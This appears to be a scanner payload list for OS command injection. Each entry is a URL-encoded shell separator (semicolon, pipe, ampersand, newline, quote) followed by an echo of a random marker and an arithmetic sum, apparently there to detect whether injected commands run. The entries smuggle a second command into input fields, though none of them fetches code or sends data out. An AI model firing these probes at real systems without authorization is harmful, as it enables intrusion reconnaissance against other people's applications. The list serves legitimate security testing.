+os-command-injection,'%7C%7Cecho%20KFGGEG$((58%2B43))$(echo%20KFGGEG)KFGGEG' +os-command-injection,'echo%20UBUDSE$((16%2B26))$(echo%20UBUDSE)UBUDSE//' +os-command-injection,'%20echo%20KHPIMN$((0%2B66))$(echo%20KHPIMN)KHPIMN//' +os-command-injection,';echo%20EHYWRC$((59%2B33))$(echo%20EHYWRC)EHYWRC//' +os-command-injection,'&echo%20UOYNSV$((79%2B21))$(echo%20UOYNSV)UOYNSV//' +os-command-injection,'|echo%20ZZWTRH$((46%2B12))$(echo%20ZZWTRH)ZZWTRH//' +os-command-injection,'||echo%20UTNZMD$((71%2B95))$(echo%20UTNZMD)UTNZMD//' +os-command-injection,'&&echo%20YHOOON$((42%2B16))$(echo%20YHOOON)YHOOON//' +os-command-injection,'%0aecho%20ROPVAP$((13%2B72))$(echo%20ROPVAP)ROPVAP//' +os-command-injection,'%3Becho%20NPXSTO$((33%2B52))$(echo%20NPXSTO)NPXSTO//' +os-command-injection,'%26echo%20FHCIJT$((25%2B52))$(echo%20FHCIJT)FHCIJT//' +os-command-injection,'%26%26echo%20YFZXJX$((50%2B26))$(echo%20YFZXJX)YFZXJX//' +os-command-injection,'%7Cecho%20WRHIUR$((44%2B71))$(echo%20WRHIUR)WRHIUR//' +os-command-injection,'%7C%7Cecho%20VVOSGY$((73%2B71))$(echo%20VVOSGY)VVOSGY//' +os-command-injection,'echo%20NTPEFH$((79%2B40))$(echo%20NTPEFH)NTPEFH\' +os-command-injection,'%20echo%20GQTWXI$((72%2B93))$(echo%20GQTWXI)GQTWXI\' +os-command-injection,';echo%20LYCBWG$((29%2B74))$(echo%20LYCBWG)LYCBWG\' +os-command-injection,'&echo%20COCFSF$((53%2B30))$(echo%20COCFSF)COCFSF\' +os-command-injection,'|echo%20DNZLFZ$((68%2B73))$(echo%20DNZLFZ)DNZLFZ\' +os-command-injection,'||echo%20CHDICH$((89%2B46))$(echo%20CHDICH)CHDICH\' +os-command-injection,'&&echo%20EOJNNV$((5%2B12))$(echo%20EOJNNV)EOJNNV\' +os-command-injection,'%0aecho%20MTJRGS$((58%2B47))$(echo%20MTJRGS)MTJRGS\' +os-command-injection,'%3Becho%20AXQXDI$((25%2B77))$(echo%20AXQXDI)AXQXDI\' +os-command-injection,'%26echo%20TLKWXC$((53%2B68))$(echo%20TLKWXC)TLKWXC\' +os-command-injection,'%26%26echo%20TTJGWL$((57%2B61))$(echo%20TTJGWL)TTJGWL\' +os-command-injection,'%7Cecho%20SESECV$((72%2B10))$(echo%20SESECV)SESECV\' +os-command-injection,'%7C%7Cecho%20DBIODL$((87%2B8))$(echo%20DBIODL)DBIODL\' +os-command-injection,'echo%20YBHKVY$((91%2B88))$(echo%20YBHKVY)YBHKVY&' +os-command-injection,'%20echo%20TIXAPY$((54%2B72))$(echo%20TIXAPY)TIXAPY&' +os-command-injection,';echo%20JKKCWD$((16%2B48))$(echo%20JKKCWD)JKKCWD&' +os-command-injection,'&echo%20BVRSLI$((35%2B17))$(echo%20BVRSLI)BVRSLI&' +os-command-injection,'|echo%20VEMEGX$((63%2B29))$(echo%20VEMEGX)VEMEGX&' +os-command-injection,'||echo%20OQQCRP$((22%2B72))$(echo%20OQQCRP)OQQCRP&' +os-command-injection,'&&echo%20VNXUYU$((30%2B64))$(echo%20VNXUYU)VNXUYU&' +os-command-injection,'%0aecho%20SROSKU$((1%2B28))$(echo%20SROSKU)SROSKU&' +os-command-injection,'%3Becho%20VWPRCE$((29%2B7))$(echo%20VWPRCE)VWPRCE&' +os-command-injection,'%26echo%20WLJIPQ$((79%2B90))$(echo%20WLJIPQ)WLJIPQ&' +os-command-injection,'%26%26echo%20SSASTK$((41%2B1))$(echo%20SSASTK)SSASTK&' +os-command-injection,'%7Cecho%20PVDDDJ$((29%2B98))$(echo%20PVDDDJ)PVDDDJ&' +os-command-injection,'%7C%7Cecho%20WODZTP$((31%2B33))$(echo%20WODZTP)WODZTP&' +os-command-injection,'echo%20JRBQAO$((30%2B54))$(echo%20JRBQAO)JRBQAO|' +os-command-injection,'%20echo%20LYYSLZ$((61%2B82))$(echo%20LYYSLZ)LYYSLZ|' +os-command-injection,';echo%20SGDKKT$((60%2B36))$(echo%20SGDKKT)SGDKKT|' +os-command-injection,'&echo%20SRNNCB$((90%2B39))$(echo%20SRNNCB)SRNNCB|' +os-command-injection,'|echo%20LCIJBI$((90%2B7))$(echo%20LCIJBI)LCIJBI|' +os-command-injection,'||echo%20HRBLJP$((7%2B73))$(echo%20HRBLJP)HRBLJP|' +os-command-injection,'&&echo%20ELOSZQ$((77%2B50))$(echo%20ELOSZQ)ELOSZQ|' +os-command-injection,'%0aecho%20SGYETR$((24%2B19))$(echo%20SGYETR)SGYETR|' +os-command-injection,'%3Becho%20TJXONB$((49%2B24))$(echo%20TJXONB)TJXONB|' +os-command-injection,'%26echo%20YCRSFZ$((33%2B21))$(echo%20YCRSFZ)YCRSFZ|' +os-command-injection,'%26%26echo%20UWWCWD$((83%2B98))$(echo%20UWWCWD)UWWCWD|' +os-command-injection,'%7Cecho%20XJGESW$((2%2B77))$(echo%20XJGESW)XJGESW|' +os-command-injection,'%7C%7Cecho%20QBEEHF$((22%2B49))$(echo%20QBEEHF)QBEEHF|' +os-command-injection,'echo%20TWRCSC$((11%2B79))$(echo%20TWRCSC)TWRCSC%27' +os-command-injection,'%20echo%20UTDRGU$((88%2B93))$(echo%20UTDRGU)UTDRGU%27' +os-command-injection,';echo%20KMAFWV$((53%2B22))$(echo%20KMAFWV)KMAFWV%27' +os-command-injection,'&echo%20WYAISD$((66%2B10))$(echo%20WYAISD)WYAISD%27' +os-command-injection,'|echo%20EEPGGY$((39%2B86))$(echo%20EEPGGY)EEPGGY%27' +os-command-injection,'||echo%20CSDAYB$((1%2B92))$(echo%20CSDAYB)CSDAYB%27' +os-command-injection,'&&echo%20GHXSEE$((91%2B16))$(echo%20GHXSEE)GHXSEE%27' +os-command-injection,'%0aecho%20JLCIIE$((76%2B4))$(echo%20JLCIIE)JLCIIE%27' +os-command-injection,'%3Becho%20KTVSOY$((3%2B81))$(echo%20KTVSOY)KTVSOY%27' +os-command-injection,'%26echo%20NPROKF$((49%2B32))$(echo%20NPROKF)NPROKF%27' +os-command-injection,'%26%26echo%20TQYXWB$((55%2B46))$(echo%20TQYXWB)TQYXWB%27' +os-command-injection,'%7Cecho%20TAQPYI$((0%2B30))$(echo%20TAQPYI)TAQPYI%27' +os-command-injection,'%7C%7Cecho%20EMZGLE$((57%2B51))$(echo%20EMZGLE)EMZGLE%27' +os-command-injection,'echo%20VDJOCF$((50%2B82))$(echo%20VDJOCF)VDJOCF%22' +os-command-injection,'%20echo%20UDTOAM$((20%2B61))$(echo%20UDTOAM)UDTOAM%22' +os-command-injection,';echo%20BUUBFP$((84%2B64))$(echo%20BUUBFP)BUUBFP%22' +os-command-injection,'&echo%20ZCQYVF$((95%2B44))$(echo%20ZCQYVF)ZCQYVF%22' +os-command-injection,'|echo%20JRKNBQ$((94%2B67))$(echo%20JRKNBQ)JRKNBQ%22' +os-command-injection,'||echo%20AHERUV$((2%2B2))$(echo%20AHERUV)AHERUV%22' +os-command-injection,'&&echo%20PSXDYR$((30%2B29))$(echo%20PSXDYR)PSXDYR%22' +os-command-injection,'%0aecho%20QDWRHU$((33%2B84))$(echo%20QDWRHU)QDWRHU%22' +os-command-injection,'%3Becho%20MUYISP$((6%2B57))$(echo%20MUYISP)MUYISP%22' +os-command-injection,'%26echo%20AUFDNI$((4%2B13))$(echo%20AUFDNI)AUFDNI%22' +os-command-injection,'%26%26echo%20KEKCUX$((55%2B27))$(echo%20KEKCUX)KEKCUX%22' +os-command-injection,'%7Cecho%20PUCKTG$((40%2B18))$(echo%20PUCKTG)PUCKTG%22' +os-command-injection,'%7C%7Cecho%20SPDMBT$((54%2B37))$(echo%20SPDMBT)SPDMBT%22' +os-command-injection,'echo%20WHLWIO$((67%2B20))$(echo%20WHLWIO)WHLWIO%5C%5C' +os-command-injection,'%20echo%20VZZWBN$((81%2B34))$(echo%20VZZWBN)VZZWBN%5C%5C' +os-command-injection,';echo%20HMKHHL$((82%2B49))$(echo%20HMKHHL)HMKHHL%5C%5C' +os-command-injection,'&echo%20ZBAFWV$((66%2B6))$(echo%20ZBAFWV)ZBAFWV%5C%5C' +os-command-injection,'|echo%20UKNYWO$((51%2B97))$(echo%20UKNYWO)UKNYWO%5C%5C' +os-command-injection,'||echo%20NIGBVP$((58%2B3))$(echo%20NIGBVP)NIGBVP%5C%5C' +os-command-injection,'&&echo%20IIQUKI$((89%2B19))$(echo%20IIQUKI)IIQUKI%5C%5C' +os-command-injection,'%0aecho%20ARNNHW$((53%2B8))$(echo%20ARNNHW)ARNNHW%5C%5C' +os-command-injection,'%3Becho%20GDQLRU$((11%2B47))$(echo%20GDQLRU)GDQLRU%5C%5C' +os-command-injection,'%26echo%20GVMHYL$((95%2B75))$(echo%20GVMHYL)GVMHYL%5C%5C' +os-command-injection,'%26%26echo%20ZIFPOD$((88%2B33))$(echo%20ZIFPOD)ZIFPOD%5C%5C' +os-command-injection,'%7Cecho%20CSSFWU$((98%2B21))$(echo%20CSSFWU)CSSFWU%5C%5C' +os-command-injection,'%7C%7Cecho%20PWFAGG$((70%2B41))$(echo%20PWFAGG)PWFAGG%5C%5C' +os-command-injection,'echo%20VWXGBL$((23%2B33))$(echo%20VWXGBL)VWXGBL%2F%2F' +os-command-injection,'%20echo%20QZBSFJ$((43%2B35))$(echo%20QZBSFJ)QZBSFJ%2F%2F' +os-command-injection,';echo%20ARXZSC$((51%2B16))$(echo%20ARXZSC)ARXZSC%2F%2F' +os-command-injection,'&echo%20EDOOGB$((28%2B29))$(echo%20EDOOGB)EDOOGB%2F%2F' +os-command-injection,'|echo%20ELJTMV$((55%2B23))$(echo%20ELJTMV)ELJTMV%2F%2F' +os-command-injection,'||echo%20HVNHYL$((74%2B86))$(echo%20HVNHYL)HVNHYL%2F%2F' +os-command-injection,'&&echo%20KYHFUU$((41%2B61))$(echo%20KYHFUU)KYHFUU%2F%2F' +os-command-injection,'%0aecho%20COCDTZ$((30%2B94))$(echo%20COCDTZ)COCDTZ%2F%2F' +os-command-injection,'%3Becho%20FOTFWD$((3%2B5))$(echo%20FOTFWD)FOTFWD%2F%2F' +os-command-injection,'%26echo%20UUQPGU$((66%2B46))$(echo%20UUQPGU)UUQPGU%2F%2F' +os-command-injection,'%26%26echo%20CJDFNU$((77%2B46))$(echo%20CJDFNU)CJDFNU%2F%2F' +os-command-injection,'%7Cecho%20VUMPEC$((81%2B13))$(echo%20VUMPEC)VUMPEC%2F%2F' +os-command-injection,'%7C%7Cecho%20XJVKTW$((99%2B70))$(echo%20XJVKTW)XJVKTW%2F%2F' +os-command-injection,'echo%20LFNYYO$((14%2B97))$(echo%20LFNYYO)LFNYYO%26' +os-command-injection,'%20echo%20IIDCDJ$((38%2B91))$(echo%20IIDCDJ)IIDCDJ%26' +os-command-injection,';echo%20TLPKYY$((25%2B59))$(echo%20TLPKYY)TLPKYY%26' +os-command-injection,'&echo%20QPWISS$((90%2B73))$(echo%20QPWISS)QPWISS%26' +os-command-injection,'|echo%20NAEDRV$((86%2B62))$(echo%20NAEDRV)NAEDRV%26' +os-command-injection,'||echo%20TUAKKW$((59%2B81))$(echo%20TUAKKW)TUAKKW%26' +os-command-injection,'&&echo%20RYKJGR$((75%2B28))$(echo%20RYKJGR)RYKJGR%26' +os-command-injection,'%0aecho%20BJMVLS$((87%2B51))$(echo%20BJMVLS)BJMVLS%26' +os-command-injection,'%3Becho%20DCOSDU$((41%2B86))$(echo%20DCOSDU)DCOSDU%26' +os-command-injection,'%26echo%20ZPNTLA$((40%2B1))$(echo%20ZPNTLA)ZPNTLA%26' +os-command-injection,'%26%26echo%20YAEFHT$((74%2B26))$(echo%20YAEFHT)YAEFHT%26' +os-command-injection,'%7Cecho%20AFLTJA$((66%2B14))$(echo%20AFLTJA)AFLTJA%26' +os-command-injection,'%7C%7Cecho%20ITSQLY$((14%2B91))$(echo%20ITSQLY)ITSQLY%26' +os-command-injection,'echo%20KEIBVO$((81%2B19))$(echo%20KEIBVO)KEIBVO%7C' +os-command-injection,'%20echo%20CXGLRL$((92%2B49))$(echo%20CXGLRL)CXGLRL%7C' +os-command-injection,';echo%20UQHDID$((15%2B76))$(echo%20UQHDID)UQHDID%7C' +os-command-injection,'&echo%20XDZINA$((98%2B93))$(echo%20XDZINA)XDZINA%7C' +os-command-injection,'|echo%20RGHPOG$((64%2B34))$(echo%20RGHPOG)RGHPOG%7C' +os-command-injection,'||echo%20HYCXDP$((54%2B7))$(echo%20HYCXDP)HYCXDP%7C' +os-command-injection,'&&echo%20SIYJRM$((59%2B4))$(echo%20SIYJRM)SIYJRM%7C' +os-command-injection,'%0aecho%20KEARQO$((52%2B94))$(echo%20KEARQO)KEARQO%7C' +os-command-injection,'%3Becho%20GBWBWQ$((60%2B85))$(echo%20GBWBWQ)GBWBWQ%7C' +os-command-injection,'%26echo%20LPHFGP$((58%2B11))$(echo%20LPHFGP)LPHFGP%7C' +os-command-injection,'%26%26echo%20VTKJBN$((70%2B38))$(echo%20VTKJBN)VTKJBN%7C' +os-command-injection,'%7Cecho%20MRVLAB$((69%2B71))$(echo%20MRVLAB)MRVLAB%7C' +os-command-injection,'%7C%7Cecho%20RAGAAW$((48%2B7))$(echo%20RAGAAW)RAGAAW%7C' +os-command-injection,'%27echo%20XBOYVS$((29%2B20))$(echo%20XBOYVS)XBOYVS' +os-command-injection,'%27%20echo%20GZAUTK$((17%2B45))$(echo%20GZAUTK)GZAUTK' +os-command-injection,'%27;echo%20IETDFJ$((93%2B90))$(echo%20IETDFJ)IETDFJ' +os-command-injection,'%27&echo%20NUBYOC$((86%2B87))$(echo%20NUBYOC)NUBYOC' +os-command-injection,'%27|echo%20MXSHQC$((54%2B42))$(echo%20MXSHQC)MXSHQC' +os-command-injection,'%27||echo%20FQFYSL$((20%2B12))$(echo%20FQFYSL)FQFYSL' +os-command-injection,'%27&&echo%20SIPRCW$((44%2B64))$(echo%20SIPRCW)SIPRCW' +os-command-injection,'%27%0aecho%20LDYDEO$((70%2B78))$(echo%20LDYDEO)LDYDEO' +os-command-injection,'%27%3Becho%20GCPNLC$((57%2B96))$(echo%20GCPNLC)GCPNLC' +os-command-injection,'%27%26echo%20SAULFA$((96%2B72))$(echo%20SAULFA)SAULFA' +os-command-injection,'%27%26%26echo%20LPSXXC$((9%2B32))$(echo%20LPSXXC)LPSXXC' +os-command-injection,'%27%7Cecho%20PELCUD$((9%2B37))$(echo%20PELCUD)PELCUD' +os-command-injection,'%27%7C%7Cecho%20KXXNLE$((80%2B57))$(echo%20KXXNLE)KXXNLE' +os-command-injection,'%27echo%20IOXVNX$((62%2B78))$(echo%20IOXVNX)IOXVNX'' +os-command-injection,'%27%20echo%20QKGHPD$((17%2B97))$(echo%20QKGHPD)QKGHPD'' +os-command-injection,'%27;echo%20YEDGRB$((80%2B41))$(echo%20YEDGRB)YEDGRB'' +os-command-injection,'%27&echo%20RIAXZB$((29%2B3))$(echo%20RIAXZB)RIAXZB'' +os-command-injection,'%27|echo%20EFMWXH$((10%2B86))$(echo%20EFMWXH)EFMWXH'' +os-command-injection,'%27||echo%20KKZKEG$((23%2B59))$(echo%20KKZKEG)KKZKEG'' +os-command-injection,'%27&&echo%20UDRFXR$((61%2B32))$(echo%20UDRFXR)UDRFXR'' +os-command-injection,'%27%0aecho%20KAJBJB$((99%2B88))$(echo%20KAJBJB)KAJBJB'' +os-command-injection,'%27%3Becho%20MHQWAF$((29%2B52))$(echo%20MHQWAF)MHQWAF'' +os-command-injection,'%27%26echo%20NTKAFT$((47%2B6))$(echo%20NTKAFT)NTKAFT'' +os-command-injection,'%27%26%26echo%20GAYYAM$((19%2B9))$(echo%20GAYYAM)GAYYAM'' +os-command-injection,'%27%7Cecho%20TQBVPR$((29%2B56))$(echo%20TQBVPR)TQBVPR'' +os-command-injection,'%27%7C%7Cecho%20JQLWQP$((26%2B32))$(echo%20JQLWQP)JQLWQP'' +os-command-injection,'%27echo%20IOMPVA$((3%2B97))$(echo%20IOMPVA)IOMPVA"' +os-command-injection,'%27%20echo%20BZYOZX$((41%2B40))$(echo%20BZYOZX)BZYOZX"' +os-command-injection,'%27;echo%20FIMTOH$((82%2B28))$(echo%20FIMTOH)FIMTOH"' +os-command-injection,'%27&echo%20YHYEFI$((32%2B68))$(echo%20YHYEFI)YHYEFI"' +os-command-injection,'%27|echo%20BLYANI$((69%2B87))$(echo%20BLYANI)BLYANI"' +os-command-injection,'%27||echo%20YELBOD$((58%2B80))$(echo%20YELBOD)YELBOD"' +os-command-injection,'%27&&echo%20THTPHV$((84%2B16))$(echo%20THTPHV)THTPHV"' +os-command-injection,'%27%0aecho%20DHXPBN$((74%2B0))$(echo%20DHXPBN)DHXPBN"' +os-command-injection,'%27%3Becho%20YXEFFV$((66%2B19))$(echo%20YXEFFV)YXEFFV"' +os-command-injection,'%27%26echo%20SQFUZG$((87%2B17))$(echo%20SQFUZG)SQFUZG"' +os-command-injection,'%27%26%26echo%20RFPIMF$((21%2B62))$(echo%20RFPIMF)RFPIMF"' +os-command-injection,'%27%7Cecho%20URCXUV$((95%2B4))$(echo%20URCXUV)URCXUV"' +os-command-injection,'%27%7C%7Cecho%20HFJBUM$((87%2B87))$(echo%20HFJBUM)HFJBUM"' +os-command-injection,'%27echo%20CPHNYZ$((5%2B38))$(echo%20CPHNYZ)CPHNYZ' +os-command-injection,'%27%20echo%20IVJQAB$((70%2B54))$(echo%20IVJQAB)IVJQAB' +os-command-injection,'%27;echo%20CWXAYU$((62%2B81))$(echo%20CWXAYU)CWXAYU' +os-command-injection,'%27&echo%20SIOGAT$((82%2B21))$(echo%20SIOGAT)SIOGAT' +os-command-injection,'%27|echo%20GXDPVN$((69%2B6))$(echo%20GXDPVN)GXDPVN' +os-command-injection,'%27||echo%20ULPNTA$((21%2B48))$(echo%20ULPNTA)ULPNTA' +os-command-injection,'%27&&echo%20LIFOQJ$((22%2B86))$(echo%20LIFOQJ)LIFOQJ' +os-command-injection,'%27%0aecho%20LSICCV$((22%2B94))$(echo%20LSICCV)LSICCV' +os-command-injection,'%27%3Becho%20MYVNVT$((42%2B57))$(echo%20MYVNVT)MYVNVT' +os-command-injection,'%27%26echo%20SFPNFW$((13%2B14))$(echo%20SFPNFW)SFPNFW' +os-command-injection,'%27%26%26echo%20XOEQUO$((65%2B74))$(echo%20XOEQUO)XOEQUO' +os-command-injection,'%27%7Cecho%20JZJOSI$((32%2B42))$(echo%20JZJOSI)JZJOSI' +os-command-injection,'%27%7C%7Cecho%20GQLDDF$((67%2B97))$(echo%20GQLDDF)GQLDDF' +os-command-injection,'%27echo%20QFGAIQ$((42%2B15))$(echo%20QFGAIQ)QFGAIQ//' +os-command-injection,'%27%20echo%20EGNSNW$((91%2B88))$(echo%20EGNSNW)EGNSNW//' +os-command-injection,'%27;echo%20BXNDAG$((17%2B65))$(echo%20BXNDAG)BXNDAG//' +os-command-injection,'%27&echo%20DUJCYR$((3%2B43))$(echo%20DUJCYR)DUJCYR//' +os-command-injection,'%27|echo%20XXJDRI$((78%2B40))$(echo%20XXJDRI)XXJDRI//' +os-command-injection,'%27||echo%20RTVDXH$((26%2B45))$(echo%20RTVDXH)RTVDXH//' +os-command-injection,'%27&&echo%20DZOCJQ$((86%2B39))$(echo%20DZOCJQ)DZOCJQ//' +os-command-injection,'%27%0aecho%20IKZDMH$((10%2B92))$(echo%20IKZDMH)IKZDMH//' +os-command-injection,'%27%3Becho%20YSASGM$((95%2B50))$(echo%20YSASGM)YSASGM//' +os-command-injection,'%27%26echo%20TSJQIY$((55%2B20))$(echo%20TSJQIY)TSJQIY//' +os-command-injection,'%27%26%26echo%20ALGYVZ$((76%2B83))$(echo%20ALGYVZ)ALGYVZ//' +os-command-injection,'%27%7Cecho%20GCKHEE$((25%2B33))$(echo%20GCKHEE)GCKHEE//' +os-command-injection,'%27%7C%7Cecho%20IJHDBG$((39%2B40))$(echo%20IJHDBG)IJHDBG//' +os-command-injection,'%27echo%20RMKRIK$((54%2B62))$(echo%20RMKRIK)RMKRIK\' +os-command-injection,'%27%20echo%20FRIWEP$((93%2B33))$(echo%20FRIWEP)FRIWEP\' +os-command-injection,'%27;echo%20HPMAEK$((9%2B6))$(echo%20HPMAEK)HPMAEK\' +os-command-injection,'%27&echo%20GPEMQS$((51%2B70))$(echo%20GPEMQS)GPEMQS\' +os-command-injection,'%27|echo%20YDDQHZ$((64%2B41))$(echo%20YDDQHZ)YDDQHZ\' +os-command-injection,'%27||echo%20SBOJIW$((28%2B58))$(echo%20SBOJIW)SBOJIW\' +os-command-injection,'%27&&echo%20QINFDZ$((25%2B98))$(echo%20QINFDZ)QINFDZ\' +os-command-injection,'%27%0aecho%20LJFJVH$((10%2B34))$(echo%20LJFJVH)LJFJVH\' +os-command-injection,'%27%3Becho%20AWVIEM$((26%2B50))$(echo%20AWVIEM)AWVIEM\' +os-command-injection,'%27%26echo%20PCODKZ$((48%2B2))$(echo%20PCODKZ)PCODKZ\' +os-command-injection,'%27%26%26echo%20SLPZUK$((69%2B4))$(echo%20SLPZUK)SLPZUK\' +os-command-injection,'%27%7Cecho%20GZDPZK$((6%2B29))$(echo%20GZDPZK)GZDPZK\' +os-command-injection,'%27%7C%7Cecho%20YEMQVY$((61%2B88))$(echo%20YEMQVY)YEMQVY\' +os-command-injection,'%27echo%20TKPBHT$((87%2B27))$(echo%20TKPBHT)TKPBHT&' +os-command-injection,'%27%20echo%20VEQJIY$((50%2B4))$(echo%20VEQJIY)VEQJIY&' +os-command-injection,'%27;echo%20WMMUXQ$((27%2B51))$(echo%20WMMUXQ)WMMUXQ&' +os-command-injection,'%27&echo%20BJUNBG$((90%2B77))$(echo%20BJUNBG)BJUNBG&' +os-command-injection,'%27|echo%20WEYPRV$((18%2B9))$(echo%20WEYPRV)WEYPRV&' +os-command-injection,'%27||echo%20HVWYSC$((52%2B13))$(echo%20HVWYSC)HVWYSC&' +os-command-injection,'%27&&echo%20ZUDZMD$((43%2B75))$(echo%20ZUDZMD)ZUDZMD&' +os-command-injection,'%27%0aecho%20YJUICB$((52%2B55))$(echo%20YJUICB)YJUICB&' +os-command-injection,'%27%3Becho%20ICUPEK$((37%2B11))$(echo%20ICUPEK)ICUPEK&' +os-command-injection,'%27%26echo%20PAFSCK$((22%2B53))$(echo%20PAFSCK)PAFSCK&' +os-command-injection,'%27%26%26echo%20VFVJGA$((34%2B26))$(echo%20VFVJGA)VFVJGA&' +os-command-injection,'%27%7Cecho%20PEBEOY$((43%2B44))$(echo%20PEBEOY)PEBEOY&' +os-command-injection,'%27%7C%7Cecho%20ETYFQP$((33%2B58))$(echo%20ETYFQP)ETYFQP&' +os-command-injection,'%27echo%20MEZJPT$((67%2B11))$(echo%20MEZJPT)MEZJPT|' +os-command-injection,'%27%20echo%20DOXQVC$((74%2B61))$(echo%20DOXQVC)DOXQVC|' +os-command-injection,'%27;echo%20WAGVJJ$((84%2B94))$(echo%20WAGVJJ)WAGVJJ|' +os-command-injection,'%27&echo%20YUMWMH$((91%2B2))$(echo%20YUMWMH)YUMWMH|' +os-command-injection,'%27|echo%20VLQXSQ$((5%2B5))$(echo%20VLQXSQ)VLQXSQ|' +os-command-injection,'%27||echo%20ZSDIEW$((96%2B12))$(echo%20ZSDIEW)ZSDIEW|' +os-command-injection,'%27&&echo%20MWTYAC$((26%2B86))$(echo%20MWTYAC)MWTYAC|' +os-command-injection,'%27%0aecho%20FXJFMZ$((67%2B82))$(echo%20FXJFMZ)FXJFMZ|' +os-command-injection,'%27%3Becho%20HYRAZO$((93%2B48))$(echo%20HYRAZO)HYRAZO|' +os-command-injection,'%27%26echo%20QVAOWT$((0%2B68))$(echo%20QVAOWT)QVAOWT|' +os-command-injection,'%27%26%26echo%20MEJTEK$((75%2B29))$(echo%20MEJTEK)MEJTEK|' +os-command-injection,'%27%7Cecho%20PTVJZR$((87%2B16))$(echo%20PTVJZR)PTVJZR|' +os-command-injection,'%27%7C%7Cecho%20ZXDFVL$((67%2B12))$(echo%20ZXDFVL)ZXDFVL|' +os-command-injection,'%27echo%20RGSQNO$((48%2B30))$(echo%20RGSQNO)RGSQNO%27' +os-command-injection,'%27%20echo%20DHRZFK$((82%2B16))$(echo%20DHRZFK)DHRZFK%27' +os-command-injection,'%27;echo%20MCJMIQ$((92%2B3))$(echo%20MCJMIQ)MCJMIQ%27' +os-command-injection,'%27&echo%20BQAOON$((14%2B21))$(echo%20BQAOON)BQAOON%27' +os-command-injection,'%27|echo%20QIQGXS$((79%2B42))$(echo%20QIQGXS)QIQGXS%27' +os-command-injection,'%27||echo%20XUDLIK$((35%2B13))$(echo%20XUDLIK)XUDLIK%27' +os-command-injection,'%27&&echo%20CDEUKI$((43%2B31))$(echo%20CDEUKI)CDEUKI%27' +os-command-injection,'%27%0aecho%20SDDGTU$((60%2B67))$(echo%20SDDGTU)SDDGTU%27' +os-command-injection,'%27%3Becho%20ZDXLMM$((81%2B23))$(echo%20ZDXLMM)ZDXLMM%27' +os-command-injection,'%27%26echo%20ZAXLWL$((53%2B15))$(echo%20ZAXLWL)ZAXLWL%27' +os-command-injection,'%27%26%26echo%20VYRMIL$((42%2B66))$(echo%20VYRMIL)VYRMIL%27' +os-command-injection,'%27%7Cecho%20CNIXGW$((42%2B54))$(echo%20CNIXGW)CNIXGW%27' +os-command-injection,'%27%7C%7Cecho%20PJQWDG$((53%2B4))$(echo%20PJQWDG)PJQWDG%27' +os-command-injection,'%27echo%20WMKULY$((97%2B40))$(echo%20WMKULY)WMKULY%22' +os-command-injection,'%27%20echo%20VJRMHC$((3%2B22))$(echo%20VJRMHC)VJRMHC%22' +os-command-injection,'%27;echo%20RKVIFI$((60%2B48))$(echo%20RKVIFI)RKVIFI%22' +os-command-injection,'%27&echo%20OLOQKQ$((39%2B2))$(echo%20OLOQKQ)OLOQKQ%22' +os-command-injection,'%27|echo%20RBWMSW$((98%2B45))$(echo%20RBWMSW)RBWMSW%22' +os-command-injection,'%27||echo%20NFTXSR$((84%2B40))$(echo%20NFTXSR)NFTXSR%22' +os-command-injection,'%27&&echo%20ICNFZX$((85%2B34))$(echo%20ICNFZX)ICNFZX%22' +os-command-injection,'%27%0aecho%20SXQQOX$((93%2B26))$(echo%20SXQQOX)SXQQOX%22' +os-command-injection,'%27%3Becho%20QQXBDZ$((99%2B24))$(echo%20QQXBDZ)QQXBDZ%22' +os-command-injection,'%27%26echo%20XZUUTF$((78%2B20))$(echo%20XZUUTF)XZUUTF%22' +os-command-injection,'%27%26%26echo%20DJDLKS$((28%2B16))$(echo%20DJDLKS)DJDLKS%22' +os-command-injection,'%27%7Cecho%20RMTAEV$((79%2B76))$(echo%20RMTAEV)RMTAEV%22' +os-command-injection,'%27%7C%7Cecho%20BRLUWI$((24%2B78))$(echo%20BRLUWI)BRLUWI%22' +os-command-injection,'%27echo%20HMZWLY$((77%2B96))$(echo%20HMZWLY)HMZWLY%5C%5C' +os-command-injection,'%27%20echo%20DBCEVA$((9%2B19))$(echo%20DBCEVA)DBCEVA%5C%5C' +os-command-injection,'%27;echo%20QDZRDC$((54%2B73))$(echo%20QDZRDC)QDZRDC%5C%5C' +os-command-injection,'%27&echo%20SCIQBL$((85%2B51))$(echo%20SCIQBL)SCIQBL%5C%5C' +os-command-injection,'%27|echo%20PRMMPK$((67%2B45))$(echo%20PRMMPK)PRMMPK%5C%5C' +os-command-injection,'%27||echo%20WQKJHL$((97%2B29))$(echo%20WQKJHL)WQKJHL%5C%5C' +os-command-injection,'%27&&echo%20FBQVWJ$((2%2B58))$(echo%20FBQVWJ)FBQVWJ%5C%5C' +os-command-injection,'%27%0aecho%20SUTPRJ$((93%2B86))$(echo%20SUTPRJ)SUTPRJ%5C%5C' +os-command-injection,'%27%3Becho%20IKGCWR$((71%2B55))$(echo%20IKGCWR)IKGCWR%5C%5C' +os-command-injection,'%27%26echo%20RLARCW$((64%2B37))$(echo%20RLARCW)RLARCW%5C%5C' +os-command-injection,'%27%26%26echo%20FIDBBA$((41%2B96))$(echo%20FIDBBA)FIDBBA%5C%5C' +os-command-injection,'%27%7Cecho%20OWEWCR$((30%2B3))$(echo%20OWEWCR)OWEWCR%5C%5C' +os-command-injection,'%27%7C%7Cecho%20JUQYUK$((27%2B47))$(echo%20JUQYUK)JUQYUK%5C%5C' +os-command-injection,'%27echo%20YLNBVA$((75%2B72))$(echo%20YLNBVA)YLNBVA%2F%2F' +os-command-injection,'%27%20echo%20DWDUKP$((90%2B61))$(echo%20DWDUKP)DWDUKP%2F%2F' +os-command-injection,'%27;echo%20RWVNGG$((78%2B53))$(echo%20RWVNGG)RWVNGG%2F%2F' +os-command-injection,'%27&echo%20VSBIXB$((26%2B99))$(echo%20VSBIXB)VSBIXB%2F%2F' +os-command-injection,'%27|echo%20EBNPAG$((16%2B53))$(echo%20EBNPAG)EBNPAG%2F%2F' +os-command-injection,'%27||echo%20VDIYTJ$((0%2B65))$(echo%20VDIYTJ)VDIYTJ%2F%2F' +os-command-injection,'%27&&echo%20NLWQZV$((48%2B73))$(echo%20NLWQZV)NLWQZV%2F%2F' +os-command-injection,'%27%0aecho%20NZXQYS$((60%2B28))$(echo%20NZXQYS)NZXQYS%2F%2F' +os-command-injection,'%27%3Becho%20DRGCTI$((40%2B71))$(echo%20DRGCTI)DRGCTI%2F%2F' +os-command-injection,'%27%26echo%20YQPXBQ$((33%2B15))$(echo%20YQPXBQ)YQPXBQ%2F%2F' +os-command-injection,'%27%26%26echo%20KBSBEA$((42%2B79))$(echo%20KBSBEA)KBSBEA%2F%2F' 